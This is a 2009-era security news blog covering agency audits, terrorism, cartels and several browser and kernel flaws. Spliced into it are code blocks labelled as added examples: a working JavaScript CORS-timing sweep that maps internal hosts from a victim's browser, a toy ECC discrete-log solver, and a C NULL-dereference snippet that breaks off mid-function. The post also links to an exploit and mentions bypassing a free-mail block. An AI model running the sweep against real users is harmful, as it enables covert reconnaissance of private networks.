Vordel has made an attempt to block the use of free e-mail accounts (i.e. Mailinator) but they forgot to include the alternative mailinator domains, like sogetthis.com ;)

GAO: Many Federal Agencies Still Don't Meet Security Standards

Via DarkReading -

Virtually all of the U.S. federal government's key civilian agencies are still falling short of the security marks they have been asked to meet, according to the Government Accountability Office (GAO).

In a report (PDF) issued earlier today, the GAO says of the 24 agencies reviewed, almost all had deficiencies in security controls and management, "leaving them vulnerable to attack or compromise." The GAO says it has made "hundreds" of recommendations to the agencies, yet many have not been addressed.

During the past three years, the number of incidents reported by federal agencies to U.S.-CERT has increased by almost 200 percent -- from 5,503 in 2006 to 16,843 in 2008, according to the report. More than one-third of the incidents are still under investigation, and the sources of the compromises are not yet known.

Of the incidents in which the sources are known, approximately 22 percent were caused by improper use of computers by authorized users, the report states. Eighteen percent of the compromises were caused by unauthorized access, and 14 percent were caused by malicious code. About 12 percent of the breaches were caused by scans, probes, or attempted access by external attackers, the report says.

Of the 24 agencies reviewed, 13 reported "significant deficiencies" in information security, the GAO says. Seven agencies reported "material weaknesses" that still have not been repaired. Only four agencies reported "no significant weakness," the report states.

Indonesian TV Identifies Another Jakarta Hotel Bomber

Via xinhuanet.com -

An Indonesian television station on Tuesday evening revealed the identity of another suicide bomber at the Ritz Carlton Hotel as Ibrahim, a florist at the hotel, who carried out his attack on Friday alongside Nurhasbi, the bomber at the JW Marriott Hotel in Jakarta.

Based on CCTV footage recorded seconds before the blast at 07:47 at the Erlangga restaurant in the Ritz Carlton Hotel, a man believed to be Ibrahim, 36, walked unsteadily carrying a black bag that appeared very heavy, Metro television said.

Ibrahim's whereabouts have been unknown since the July 17 bombings at the two luxury hotels, which are located opposite each other, killed nine people and wounded 55 others, half of them foreigners. The police conducted DNA tests to confirm the identity of Ibrahim's body.

According to the hotel's attendance list, Ibrahim was working on Friday morning, the day of the bombings.

He called his family before the blasts.

After the bombings, his family looked for him at several hospitals where victims of the explosions were being treated.

Police are identifying body parts found at the scene, but it is still unknown whether any of them belong to Ibrahim.

The perpetrators assembled the bombs in room 1808 of the JW Marriott Hotel. They booked the room on July 10 and checked in at 15:01 Jakarta time (0901 GMT) on July 15, two days before carrying out their deadly attacks. After the blasts, police found an active bomb in a black laptop bag.

The police have found similarities between the equipment and methods used in these bombs and those detonated in Bali in 2002 and 2005, as well as the device found in a recent raid in Cilacap, Central Java, for which the regional militant network Jemaah Islamiyah was responsible.

Police are widening their investigation of the group.

The blasts at the JW Marriott Hotel and Ritz Carlton Hotel in Jakarta's main business district occurred after a four-year absence of major terrorist attacks in the country.

Indonesia suffered a series of terrorist attacks from 2000 to 2005, including the Bali bombings, the JW Marriott explosion and the Australian embassy bombing in Jakarta, which together killed more than 250 people.

The police and analysts said that the bombings at the two hotels were carried out by a breakaway faction of Jemaah Islamiyah led by Malaysian fugitive Noordin Moh Top, who had organized the major bombings in Indonesia targeting foreigners and their facilities. He has been a main target of the police.

Monday, July 20, 2009

U.S. Steps Up Pressure on 'The Company' - Leaders of Los Zetas

Via Yahoo! News (AP) -

The Department of State offered up to $50 million Monday for information leading to the arrests of 10 top Mexican drug suspects accused of key roles in a violent organization estimated to have sold more than $1 billion worth of drugs in the United States.

U.S. Attorney Benton J. Campbell said the reward money and new federal charges were among U.S. efforts to dismantle a powerful drug trafficking organization known as The Company, whose members came from an elite security force called Los Zetas.

The only name on an indictment unsealed in federal court in Brooklyn was Miguel Trevino-Morales, a fugitive charged with operating a continuing criminal enterprise, international cocaine distribution and firearms violations. The indictment also sought the forfeiture of $1 billion in drug proceeds.

Campbell said in a release that Trevino-Morales, who could face life in prison if convicted, was the principal leader of Los Zetas, a group that includes former members of the Air Mobile Special Forces Group of the Mexican military who went into the drug-smuggling business.

In Washington, the Department of State announced it was offering a total of $50 million for tips leading to the capture of the defendants, including four leaders who were designated as narcotics kingpins by the U.S. Department of the Treasury's Office of Foreign Assets Control.

The government said it was offering up to $5 million apiece for information leading to the arrests of 10 people, one of whom has been captured.

Nineteen defendants have been charged in an indictment in federal court in Washington with drug trafficking-related crimes, and others are charged in indictments in federal court in Houston.

"The joint efforts announced today are significant steps in the department's strategy to stop the flow of illegal drugs into our communities and the shipment of drug proceeds back to Mexico," Campbell said.

Assistant Attorney General Lanny A. Breuer said the actions taken Monday will at least make it more difficult for the drug dealers to move cash around.

"We have learned that the most effective way to disrupt and dismantle criminal organizations is to prosecute their leaders and seize their funding," she said in a release. "We stand shoulder-to-shoulder with our brave Mexican colleagues in the fight against these destructive cartels."

The Foreign Narcotics Kingpin Designation Act, which became law in 1999, prohibits all trade and transactions between U.S. companies and individuals and significant foreign narcotics traffickers, their organizations and associates who act on their behalf.

Fewer than 100 people have been designated narcotics kingpins since the first major targets were announced in June 2000.

The indictment unsealed in Brooklyn said the drug organization, formerly known as the Gulf Cartel, had become the dominant force in the drug trade along the Gulf of Mexico, transporting multi-ton quantities of cocaine each month from Mexico to Texas after obtaining it in Guatemala, Colombia, Venezuela and elsewhere.

XMLHttpRequest “Ping” Sweeping in Firefox 3.5+

Via ha.ckers.org (Rsnake) -

Jeremiah brought my attention to the new Firefox 3.5+ CORS (Cross-Origin Resource Sharing), which is a way to do a cross-domain XMLHttpRequest. Does that sound scary? Well, it is, but there’s been a ton of work into hardening it. It has all sorts of cross-domain opt-in verification built into it to limit the abuse. Honestly, if you look at the people who were acknowledged in its construction, it’s a who’s who of people who understand cross-domain browser security issues. So it wasn’t surprising that it was fairly free of obvious flaws.

Anyway, I was poking around with it and I noticed that it had one fairly strange issue. Although an attacker is not allowed to know if the page was there or not (only if it was allowed to see the content or not), the attacker is still allowed to make an initial request. In doing so that initial request can be used as a pseudo “ping” sweep. You can tell if the site is there or not because it will either return immediately (latency and threading applies) or it will wait around much longer (between 20-75 seconds on the several networks I’ve run this on) before the browser gives up. That timing difference is pretty substantial - and as a result you can enumerate a substantial amount of internal address space behind the victim’s firewall and relatively quickly. I created a demo here (works only in Firefox 3.5+ and you must enable JavaScript globally for this to work). It won’t work if you just whitelist ha.ckers.org you have to globally allow JavaScript if you use Noscript for the demo to work - and you must disable ABE in Noscript as well.

You can read the page for the details, like the fact that basic and digest authentication popups are suppressed, which makes this technique ideal for intranets where those are common and would normally alert a user to the fact that something was wrong in the browser. It also doesn’t matter whether you do or don’t have port 80 open for this to work. I should note that there is an IE8.0 version of Firefox’s XMLHttpRequest called XDomainRequest, but I didn’t have much time this weekend to try to get it working in both browsers, so I have no idea if it has the same issue or not.

Incidentally, Jeremiah and I both gave the thumbs up to the idea of a cross domain XHR several years ago when the Mozilla team first asked us about the concept. Because there are so many other things wrong with the browser Jeremiah and I told them that it wouldn’t change much - the browser is already so broken from a security perspective that it really didn’t matter - a sad commentary thinking back. Of course, it really is all about the implementation.
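The timing side channel described in the post above, as an added example that is not RSnake's demo code: a cross-origin XMLHttpRequest whose body CORS will never expose, but whose time-to-failure still tells the page whether an internal address is in use. The 2 s alive/absent cut-off, the 4 s per-request timeout and the 10.0.0.0/24 range in the usage comment are assumptions for illustration, not figures from the post; the classifier is kept separate from the browser probe so the sweep logic can be exercised with constructed measurements.

```javascript
// Added example (not RSnake's demo code): the cross-origin XMLHttpRequest
// timing side channel described above, used as a LAN "ping sweep".
// CORS withholds the response body, but the time until onload/onerror
// fires still leaks whether an address is in use: a live host answers
// (or resets the connection) within milliseconds and the request errors
// out at once, while an unused address leaves the browser waiting for
// its connect timeout. Assumptions not taken from the post: the 2 s
// alive/absent cut-off, the 4 s per-request timeout, and the 10.0.0.0/24
// target range in the usage comment.

const ALIVE_THRESHOLD_MS = 2000; // assumption: failure faster than this means something answered
const PROBE_TIMEOUT_MS = 4000;   // assumption: give up well before the browser's own timeout

// Enumerate the usable host addresses of an IPv4 /24 from its first three octets.
function hostsInSlash24(prefix) {
  const hosts = [];
  for (let last = 1; last <= 254; last++) hosts.push(`${prefix}.${last}`);
  return hosts;
}

// Pure classifier (testable without a browser): a probe that finished, by
// success or error, under the threshold is counted alive; one that ran into
// the timeout is counted absent.
function classify(measurements, thresholdMs = ALIVE_THRESHOLD_MS) {
  const alive = [];
  const absent = [];
  for (const { host, elapsedMs } of measurements) {
    (elapsedMs < thresholdMs ? alive : absent).push(host);
  }
  return { alive, absent };
}

// Browser-side probe. Resolves with elapsed milliseconds whatever happened:
// onerror fires both for a refused connection and for a response the
// same-origin policy refuses to expose, which is why timing, not status, is
// the signal. Port 80 need not be open on the target for this to work.
function xhrProbe(host, timeoutMs = PROBE_TIMEOUT_MS) {
  return new Promise((resolve) => {
    const started = Date.now();
    const xhr = new XMLHttpRequest();
    const finish = () => resolve({ host, elapsedMs: Date.now() - started });
    xhr.onload = finish;
    xhr.onerror = finish;
    xhr.ontimeout = finish;
    xhr.open('GET', `http://${host}/`, true);
    xhr.timeout = timeoutMs;
    xhr.send();
  });
}

// Sweep with bounded concurrency. `probe` is injectable so the logic can be
// driven by a fake outside a browser and by xhrProbe inside one.
async function sweep(hosts, probe = xhrProbe, concurrency = 16, thresholdMs = ALIVE_THRESHOLD_MS) {
  const queue = hosts.slice();
  const measurements = [];
  async function worker() {
    while (queue.length > 0) {
      measurements.push(await probe(queue.shift()));
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return classify(measurements, thresholdMs);
}

// In a page (assumed target range): sweep(hostsInSlash24('10.0.0')).then(console.log);
```

The defensive takeaway is the one the post implies: the leak is in the failure timing, not in the response, so an origin policy that hides the body does not hide the host. NoScript's ABE, which the post says must be disabled for the demo, works by refusing the request to private address space from an internet origin in the first place.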

How to Dismantle a Nuclear Bomb

Via BBC (h/t Tim of ubiwar.com) -

How do you dismantle a nuclear bomb? And how do you verify another country is genuinely disarming without compromising sensitive national security material?

BBC security correspondent Gordon Corera was given exclusive access to a unique exercise run by the UK and Norway to find out.

The nuclear weapon is carefully lifted out of a large container and moved onto the floor.

Two engineers use an electric screwdriver to open up a side compartment and remove the "physics package" containing the sensitive parts of the bomb.

A scientist with a radiation detector beckons me forward as he points his machine towards the box.

It begins to emit an accelerating beeping noise. "The measurement is approximately a hundred times normal background radiation," he tells me.

"But it is not dangerous, I promise," he adds with a smile.

The lack of danger is because the bomb is not real. To inject an element of realism into this experiment, a weak radioactive material - Cobalt 60 - is used.

The dismantlement experiment is a joint exercise between the UK and Norway - the first of its kind - and was held a few miles from Oslo.

The five-day exercise has been keenly anticipated internationally as a way of building trust between nuclear weapons states and non-nuclear weapons states.

It is designed to see if one country can verify the disarmament of another country's nuclear weapon, but without any sensitive information about national security and weapon design being compromised.

In a role reversal, the Norwegians play a nuclear weapons state (called Torland) and the UK team play inspectors from Luvania, a non-nuclear weapons state.

[...]

"The aim is to develop methodologies we could use in inspections of a real nuclear facility but in an environment in which can do trial and error," explains Andreas Persbo of Vertic, which helped organise the event.

It is not an exercise in which the nuclear state is trying to clandestinely divert nuclear material or the inspecting side search for a covert facility.

[...]

In practice no nuclear weapons state has ever allowed a non-nuclear weapons state to verify disarmament. But if there was to be multilateral disarmament in the future, it may well be important to provide such states with confidence over its actions.

Officials on both sides hope that this and any future events will lead to better understanding between nuclear weapons states and non-nuclear weapons states and more collaborations, allowing trust and confidence to be increased.

DC17 Badge Pre-Release Information

https://forum.defcon.org/showthread.php?t=10655

Here are a few useful pieces of information to help you get set up and/or prepare for the DC17 Badge Hacking Contest. Unlike last year, all of the badge design documentation, including development environment, should be on the CD this year, unless there was a last minute change that I'm unaware of. Even still, I'd HIGHLY recommend getting your tools set up in advance so you come to DEFCON ready to rock. Remember, the Badge Hacking Contest is now a BLACK BADGE contest, so the stakes are raised...

* The processor this year is a Freescale MC56F8006 Digital Signal Controller. It's a brand new part, but the DSC family has been around for a while and there is plenty of code samples/examples and application notes on Freescale's site.

Main product page:
http://tinyurl.com/lyorks

Direct link to data sheet:
http://www.freescale.com/files/dsp/d...06.pdf?pspll=1

* The development environment is Freescale CodeWarrior for DSCs. It's a similar IDE to previous badges (sorry, still Windows only AFAIK, but works fine in a VM). I used Processor Expert to help with the device configuration, so you'll probably want to familiarize yourself with that feature.

Link to the tool (free, no license required):

Special Edition: CodeWarrior for 56800/E Digital Signal Controllers
http://www.freescale.com/lgfiles/upd...SSET=Downloads
or
http://tinyurl.com/kuwloq

* There will be a serial bootloader on-board to enable you to easily load your own firmware onto the badge (simply requiring a terminal program, like HyperTerminal, and the hex file). However, this year will require a bit more soldering skill to get it up and running and you will need a level shifter to convert the 3V TTL-level serial of the badge to RS232 or USB level. We'll have a few level shifter kits in the Hardware Hacking Village, but I'm sure those will go quickly, so if you're reading this, BRING YOUR OWN LEVEL SHIFTER, buy something like this: http://www.ftdichip.com/Products/Eva...L-232R-3V3.htm or bring components to put one together (an FTDI FT232R)

* In the case of completely bricking your badge during a firmware update via the bootloader, you can completely reprogram it via the MC56F8006 JTAG interface and the USB TAP hardware (I'll have one with me for emergencies).

Information on the USB TAP:
http://www.freescale.com/webapp/sps/...sp?code=USBTAP

* AFAIK, Freescale is sending at least one engineer to come and experience DEFCON, hang out, and offer technical support for hacking/developing with the badge. The Hardware Hacking Village will serve as the Badge Hacking HQ and he'll be located there. I'll try to spend as much time as I can up there, too, but the more help I give, the less likely you'll win the contest :P

Teenager Creates Fake Airline with Some Serious Social Engineering Skills

Via Times Online UK -

A teenage boy from Yorkshire succeeded in persuading British aviation executives that he was a tycoon about to launch his own airline. Using the pseudonym Adam Tait, the smooth-talking 17-year-old told airport and airline executives that he had a fleet of jets.

Tait, who said he was in his twenties, even flew to Jersey to attend a 1½-hour long meeting with the director of its airport. Their talks were considered promising enough for a further meeting to be arranged, which was due to be held next week.

Other air industry bosses found themselves dealing by telephone or e-mail with Tait’s fellow executives, David Rich and Anita Dash, who proposed to launch a cut-price Channel Islands-based airline servicing most of Europe.

What no one realised was that Tait, Rich and Dash were all the same person: an aircraft buff with the gift of the gab and an overactive imagination.

[...]

The Yorkshire teenager’s six-month-long ruse, which included placing articles in industry magazines, foundered only after one publication, Airliner World, became suspicious. It started to unravel the complex network that Tait had set up of fake websites, “virtual offices” complete with a real telephone receptionist and bogus names.

Last Monday he was questioned by Essex police while trying to gain access to a 93-seater jet at Southend airport, having convinced the plane’s marketing agent that his “company” wanted to lease it.

The police, who had intervened after being tipped off by Airliner World, discovered the boy’s true identity. Although no further action was taken, his fantasy was finally grounded.

The Sunday Times has agreed not to use Tait’s real name at the request of his father, who did not know of his son’s exploits until he was contacted last week.

He said that his son suffered from a form of autism and was “a phenomenal individual who is enterprising and creative” with an ability to recall the exact detail of every airline’s flight schedules. But the autism also made his behaviour highly challenging.

“He has been passionate about aeroplanes for about two years and his whole bedroom is plastered with them,” he said.

“Before that he came within two days of bringing the US cast of High School Musical to a 300-seat theatre in Shropshire by cutting and pasting mastheads from one company to another, masquerading as this or that.

“It would have happened, except when booking the hotel some queries were thrown up. I don’t know why he did it. He is not nasty or vindictive or malicious.”

Sunday, July 19, 2009

Mozilla Says Stack Overflow Crash Not Exploitable (CVE-2009-2479)

Via Mozilla Blog -

In the last few days, there have been several reports (including one via SANS) of a bug in Firefox related to handling of certain very long Unicode strings. While these strings can result in crashes of some versions of Firefox, the reports by press and various security agencies have incorrectly indicated that this is an exploitable bug. Our analysis indicates that it is not, and we have seen no example of exploitability.

On Windows, Firefox 3.0.x is terminated due to an uncaught exception during an attempt to allocate a very large string buffer; this termination is safe and immediate, and does not permit the execution of attacker code. In Firefox 3.5.x on Windows, the allocations are more robustly checked and no crash will result.

On the Macintosh in Firefox 3.0.x and 3.5.x, a crash occurs inside the ATSUI system library (part of OS X), due to what appears to be a failure to check allocation results. This issue is likely to affect any application using the recommended text-handling libraries on OS X. We have reported this issue to Apple, but in the event that they do not provide a fix we will look to implement mitigations in Mozilla code. We recommend that other developers who use these libraries consider a similar practice, and we have added mitigations in the past for similar bugs in these libraries.

As a result of our analysis, we do not believe that this represents an exploitable vulnerability in Firefox. Further, we believe that the IBM report is in error, and that the severity rating in the National Vulnerability Database report is incorrect. We have contacted them and hope to resolve the inaccuracies shortly.

Mike Shaver
VP Engineering, Mozilla Corporation

Captured U.S. Soldier in Taliban Video Identified

Via ABC News -

Department of Defense officials confirmed the identity of a captured American soldier in a video posted online Saturday by the Taliban.

Pfc. Bowe Bergdahl, 23, of Hailey, Idaho, went missing from his base in eastern Afghanistan on June 30. On July 3, officials declared him "missing-captured."

Early in the video, a captor holds up the soldier's dog tag to the camera. Later Bergdahl states his name and hometown.

Bergdahl is a member of 1st Battalion, 501st Parachute Infantry Regiment, 4th Brigade Combat Team, 25th Infantry Division, out of Fort Richardson, Alaska.

Taliban Releases Video of Captured U.S. Soldier

Via thestar.com -

The American soldier who went missing June 30 from his base in eastern Afghanistan and was later confirmed captured, appeared on a video posted Saturday to a website by the Taliban, two U.S. defence officials confirmed.

The soldier is shown in the 28-minute video with his head shaved and the start of a beard. He is sitting and dressed in a nondescript, grey outfit. Early in the video one of his captors holds the soldier's dog tag up to the camera. His name and ID number are clearly visible. He is shown eating at one point and sitting on a bed.

The soldier, whose identity has not yet been released by the Pentagon pending notification of members of Congress and the soldier's family, says his name, age and hometown on the video, which was released Saturday on a website pointed out by the Taliban. Two U.S. defence officials confirmed to The Associated Press that the man in the video is the captured soldier.

The soldier said the date is July 14. He says he was captured when he lagged behind on a patrol.

He is interviewed in English by his captors, and he is asked his views on the war, which he calls extremely hard, his desire to learn more about Islam and the morale of American soldiers, which he said was low.

Asked how he was doing, the soldier said on the video:

"Well I'm scared, scared I won't be able to go home. It is very unnerving to be a prisoner."

He begins to answer questions in a matter-of-fact and sober voice, occasionally facing the camera, looking down and sometimes looking to the questioner on his left.

He later chokes up when discussing his family and his hope to marry his girlfriend.

"I have my girlfriend, who is hoping to marry," he said. "I have a very very good family that I love back home in America. And I miss them every day when I'm gone. I miss them and I'm afraid that I might not ever see them again and that I'll never be able to tell them that I love them again and I'll never be able to hug them."

Saturday, July 18, 2009

EPFL Playstation 3 Cluster Cracks 112-bit Elliptical Curve Encryption

Via H-Online.com -

Researchers at the École Polytechnique Fédérale (EPFL) in Lausanne, Switzerland, have succeeded in cracking 112-bit encryption based on elliptical curves (ECCp-112). They calculated the secret key associated with a public key by solving the Discrete Logarithm Problem (DLP) for elliptical curves, which displays a complexity of 2^60 for the numbers involved. The cracked ECC system is a set of parameters defined by the secp112r1 standard. That puts it at the lower end of the specifications for ECC encryption systems.

The computation required around half a year on the EPFL cluster, consisting of some 200 PlayStation 3s that had already served to calculate the MD5 collision for creating a fake SSL issuer certificate from RapidSSL. The ECC code designed for the cell processor of the PlayStation 3 was optimised several times during the computation period, and the researchers say that, if the optimised code had been running from the start, the computation would only have taken three and a half months. The previous record was set in 2002, when a distributed cluster consisting of around 10,000 PCs cracked an ECC key within 549 days. At that time, researchers at Notre Dame University cracked an ECCp-109 key, three bits shorter than the new record.

Dr. Arjen Lenstra, who took part in the EPFL project, told heise Security that this result isn't actually a threat to the EC encryption systems used in practice. He said the weakest encryption encountered is based on 160-bit ECC and future developments in encryption standards would in any case have to be based on at least 224-bit ECC. According to the NIST transition proposal, ECCp-160, whose encryption strength is comparable with RSA-1024, must be replaced with a stronger variant after 2010 in order to obtain FIPS certification.
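The problem the EPFL cluster solved, shown on a toy curve as an added example that is not the researchers' code: recover k from a public point Q = kG by a generic square-root-time attack. Baby-step giant-step is used here because it is deterministic and short; large-scale efforts use Pollard's rho, which does the same ~sqrt(n) work with negligible memory. The curve y^2 = x^3 + 2x + 3 over F_97 and the generator (3, 6) are constructed for illustration and have nothing to do with secp112r1; the group order is computed by brute force, which is only sensible at this size.

```javascript
// Added example, not the EPFL team's code: the elliptic-curve discrete
// logarithm problem behind the result above, solved on a constructed toy
// curve with baby-step giant-step (BSGS). Work grows as sqrt(n) in the
// group order n, which is why a 112-bit group costs on the order of 2^56
// curve operations and a 160-bit group about 2^80.

function mod(a, p) { return ((a % p) + p) % p; }

// Modular inverse by the extended Euclidean algorithm (p prime, a != 0 mod p).
function invMod(a, p) {
  let [oldR, r] = [mod(a, p), p];
  let [oldS, s] = [1, 0];
  while (r !== 0) {
    const q = Math.floor(oldR / r);
    [oldR, r] = [r, oldR - q * r];
    [oldS, s] = [s, oldS - q * s];
  }
  if (oldR !== 1) throw new Error('not invertible');
  return mod(oldS, p);
}

const INF = null; // point at infinity, the group identity

// Short Weierstrass curve y^2 = x^3 + a*x + b over F_p; points are [x, y].
class Curve {
  constructor(p, a, b) { this.p = p; this.a = a; this.b = b; }
  onCurve(P) {
    if (P === INF) return true;
    const [x, y] = P;
    return mod(y * y - (x * x * x + this.a * x + this.b), this.p) === 0;
  }
  neg(P) { return P === INF ? INF : [P[0], mod(-P[1], this.p)]; }
  add(P, Q) {
    if (P === INF) return Q;
    if (Q === INF) return P;
    const p = this.p;
    const [x1, y1] = P, [x2, y2] = Q;
    if (x1 === x2 && mod(y1 + y2, p) === 0) return INF; // P == -Q, also doubling a 2-torsion point
    const lambda = x1 === x2
      ? mod((3 * x1 * x1 + this.a) * invMod(2 * y1, p), p)   // tangent (doubling)
      : mod((y2 - y1) * invMod(x2 - x1, p), p);              // chord
    const x3 = mod(lambda * lambda - x1 - x2, p);
    const y3 = mod(lambda * (x1 - x3) - y1, p);
    return [x3, y3];
  }
  mul(k, P) { // double-and-add scalar multiplication
    let R = INF, A = P;
    while (k > 0) {
      if (k & 1) R = this.add(R, A);
      A = this.add(A, A);
      k >>= 1;
    }
    return R;
  }
  order(P) { // smallest n > 0 with n*P = INF; brute force is fine at toy size
    let n = 1, R = P;
    while (R !== INF) { R = this.add(R, P); n++; }
    return n;
  }
}

function pointEq(A, B) {
  if (A === INF || B === INF) return A === B;
  return A[0] === B[0] && A[1] === B[1];
}

// Baby-step giant-step: find k with Q = k*G, given G of order n, in O(sqrt(n)).
// Write k = i*m + j with m = ceil(sqrt(n)); then Q - i*m*G = j*G.
function bsgs(curve, G, Q, n) {
  const m = Math.ceil(Math.sqrt(n));
  const key = (P) => (P === INF ? 'INF' : `${P[0]},${P[1]}`);
  const baby = new Map();
  let R = INF;
  for (let j = 0; j < m; j++) {             // baby steps: store j*G
    if (!baby.has(key(R))) baby.set(key(R), j);
    R = curve.add(R, G);
  }
  const stride = curve.neg(curve.mul(m, G)); // -m*G
  let gamma = Q;
  for (let i = 0; i < m; i++) {             // giant steps: Q - i*m*G
    if (baby.has(key(gamma))) return mod(i * m + baby.get(key(gamma)), n);
    gamma = curve.add(gamma, stride);
  }
  throw new Error('Q is not a multiple of G');
}

// Worked run on the constructed curve: recover a secret scalar from its public point.
function demo(secret = 23) {
  const curve = new Curve(97, 2, 3);
  const G = [3, 6];                  // 6^2 = 36 = 3^3 + 2*3 + 3 (mod 97)
  const n = curve.order(G);
  const Q = curve.mul(secret, G);    // the "public key"
  const recovered = bsgs(curve, G, Q, n);
  return { n, recovered, ok: pointEq(curve.mul(recovered, G), Q) };
}
```

Scaling the same generic attack to a 112-bit group is what turned into half a year on 200 PlayStation 3s; the point Lenstra makes above is that the exponent, not the constant factor, is what protects 160-bit and larger curves.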

Orwell in 2009: Dystopian Rights Management

Via EFF -

In George Orwell's Nineteen Eighty-Four, the protagonist Winston Smith labors in obscurity to make information appear and disappear at the whims of the Ministry of Truth:

This process of continuous alteration was applied not only to newspapers, but to books, periodicals, pamphlets, posters, leaflets, films, sound-tracks, cartoons, photographs — to every kind of literature or documentation which might conceivably hold any political or ideological significance. Day by day and almost minute by minute the past was brought up to date.

The Ministry of Truth would have truly appreciated DRM and tethered devices. As many owners of Kindle e-books discovered this morning, electronic books that come rigged with DRM "copy protection," stored on e-book readers subject to Amazon remote control, can be made to disappear at the whims of their publishers, as if they never existed in the first place.

David Pogue reports today in the New York Times that books published by MobileReference, including Orwell's Nineteen Eighty-Four and Animal Farm, were remotely deleted from customers' Kindles over night. (Customers had their accounts credited for the value lost.)

This morning, hundreds of Amazon Kindle owners awoke to discover that books by a certain famous author had mysteriously disappeared from their e-book readers. These were books that they had bought and paid for—thought they owned.

But no, apparently the publisher changed its mind about offering an electronic edition, and apparently Amazon, whose business lives and dies by publisher happiness, caved. It electronically deleted all books by this author from people’s Kindles and credited their accounts for the price.

Orwell would have appreciated the irony. But he also would have been the first to predict that this problem would arise when one company sells both the books themselves and the device required to read them, when that company insists on locking up the books with "protection" that prevents them being shifted to any other device, and has the power of "remote deletion" at its fingertips. Big Brother, indeed!

This is Amazon choosing its "content partners" over its customers. There is nothing about copyright law that required these deletions -- if Amazon didn't have the rights to sell the e-books in the first place, the infringement happened when the books were sold. Remote deletion doesn't change that, and it's not an infringement for the Kindle owner simply to read the book. Can you imagine a brick-and-mortar bookstore chasing you home, entering your house, and pulling a book from your shelf after you paid good money for it? (Nor, for that matter, does Amazon reserve any "remote deletion" right in the Kindle "terms of service".)

If people want books that won't evaporate on the orders of faceless bureaucrats, if they want their libraries to last, or the right to read privately, or if they want the same ability to share or loan books that they enjoy with printed books, they should avoid buying any book that can't be copied or any e-book reader with "remote deletion" features. Project Gutenberg has e-books that won't disappear at midnight, like a pumpkin coach. Cory Doctorow sells e-books that will live as long as your hard drive and your backups keep them around. They're in unrestricted formats — like plain text, HTML, or PDF — and you can read them on devices without an Amazon Big Brother on board.

Mozilla Firefox 3.5.1 Unicode Data Remote Stack Buffer Overflow Vulnerability

A note before the links: this vulnerability isn't new. It was published two days before the release of 3.5.1.

Various analysts and sites have recently confirmed the vulnerability in Firefox 3.5.1. When exploited, it can lead to system compromise or a denial of service (DoS).

http://www.milw0rm.com/exploits/9158
http://www.securityfocus.com/bid/35707
http://isc.sans.org/diary.html?storyid=6829

Friday, July 17, 2009

US, Afghan Forces Overrun Haqqani Network 'Encampment' in Paktia

Via The Long War Journal -

The US and Afghan military have continued attacks against the Haqqani Network in eastern Afghanistan despite a threat from the group that a captured US soldier would be executed if the raids did not cease.

Last night, US and Afghan forces conducted two major raids in Paktia and Logar provinces. The raids were aimed at taking down the leadership of the Haqqani Network and gathering intelligence on the location of the captured US soldier.

The biggest raid took place against an "enemy encampment" situated "in the remote reaches of Paktia province" the US military said in a press release. The operation took place about 20 miles southeast of Gardez City, and was designed to stem the flow of foreign fighters and weapons moving from Pakistan's Taliban-controlled tribal agencies of North and South Waziristan through the Khost-Gardez Pass to the capital of Kabul.

The combined force killed "several" Haqqani Network fighters in firefights and with air support after repeatedly taking fire while moving to assault the Haqqani base. Several massive weapons caches were destroyed after US and Afghan forces overran the base.

Afghan and Coalition forces also conducted a targeted raid against a Haqqani Network safe house near the village of Ebad in Logar province. The compound is known to be used by a Haqqani commander to make roadside bombs. Three suspected Haqqani Network fighters were detained during the raid.

The US military conducted the raids the same day that Mullah Sangeen Zadran, a senior commander in the Haqqani Network, threatened to kill a US soldier unless Coalition forces end operations in two districts in Paktika and Ghazni provinces in eastern Afghanistan. The soldier was captured on June 30 after walking away from his combat outpost in Paktika province.

The US military has issued flyers in Paktia and Ghazni provinces, urging Afghans to provide intelligence on the location of the missing soldier. But the soldier may have already been moved into North Waziristan, a US intelligence official familiar with the search told The Long War Journal.

[...]

Just as the US has finally admitted that Taliban leader Mullah Omar and his senior commanders are running their Afghan operations from Quetta in Pakistan, the Haqqanis have been labeled as operating from Pakistan's tribal areas.

"The Haqqani network remains one of the most lethal Taliban organizations operating out of Pakistan's Federally Administered Tribal Areas," the US military admitted in a recent press release.

New Linux Flaw Enables Null Pointer Exploits

Via ThreatPost.com -

A researcher has published exploit code for a new vulnerability he discovered in the Linux kernel. The vulnerability is an especially interesting one in that the researcher who discovered it, Brad Spengler, has demonstrated that he can use the weakness to defeat many of the add-on security protections offered by SELinux and AppArmor.

The vulnerability is in the 2.6.30 release of the Linux kernel, and in a message to the Daily Dave mailing list Spengler said that he was able to exploit the flaw, which at first glance seemed unexploitable. He said that he was able to defeat the protection against exploiting NULL pointer dereferences on systems running SELinux and those running typical Linux implementations. SELinux is a set of security enhancements to the Linux OS developed by the National Security Agency.

Spengler also said he is able to turn off the auditing processes in SELinux, AppArmor and the Linux Security Module. He posted a video demonstration of the exploit in action on YouTube.

[...]

This code looks perfectly ok, right? Well, it is, until the compiler takes this into its hands. While optimizing the code, the compiler will see that the variable has already been assigned and will actually remove the if block (the check if tun is NULL) completely from the resulting compiled code. In other words, the compiler will introduce the vulnerability to the binary code, which didn't exist in the source code. This will cause the kernel to try to read/write data from 0x00000000, which the attacker can map to userland – and this finally pwns the box.

Until recently, exploiting NULL pointer dereferences was thought to be virtually impossible. But work done by Mark Dowd of IBM ISS last year put the lie to that. Dowd designed his technique to exploit a problem in Adobe Flash, but was able to extend it to exploit similar conditions in other applications.

-----------------------

Perfect example of how you can't find every vulnerability by reviewing source code alone: the NULL check is present in the source and only vanishes in the compiled binary.

While code review is critical to reducing the number of vulnerabilities, it is only one piece of the overall security puzzle.

Of course, the security puzzle changes so fast...there isn't a real solution...but that is another blog altogether ;)
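To make the compiler behaviour in the excerpt concrete, here is an added example, written for this post and not taken from the ISC diary, the exploit, or the kernel source. The structure name, its field and the function names are assumptions standing in for the real driver code; the shape of the bug (dereference first, NULL check second) is the pattern described above, alongside the corrected ordering and a small host check for the other half of the attack, mapping page zero from userland:

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <sys/mman.h>

/* Assumed stand-in for the kernel driver object; the real structure
 * and the field read from it differ. */
struct tun_struct {
    int flags;
};

/* The pattern the excerpt describes: the pointer is dereferenced on the
 * first line and only then checked for NULL.  Because dereferencing NULL
 * is undefined behaviour in C, GCC at -O2 (which enables
 * -fdelete-null-pointer-checks) may conclude that tun cannot be NULL by
 * the time the if runs and drop the check from the binary.  If an
 * attacker has mapped page zero in userland, the read from address 0
 * succeeds and execution continues on attacker-controlled data. */
int poll_unsafe(const struct tun_struct *tun)
{
    int flags = tun->flags;     /* dereference first ...             */
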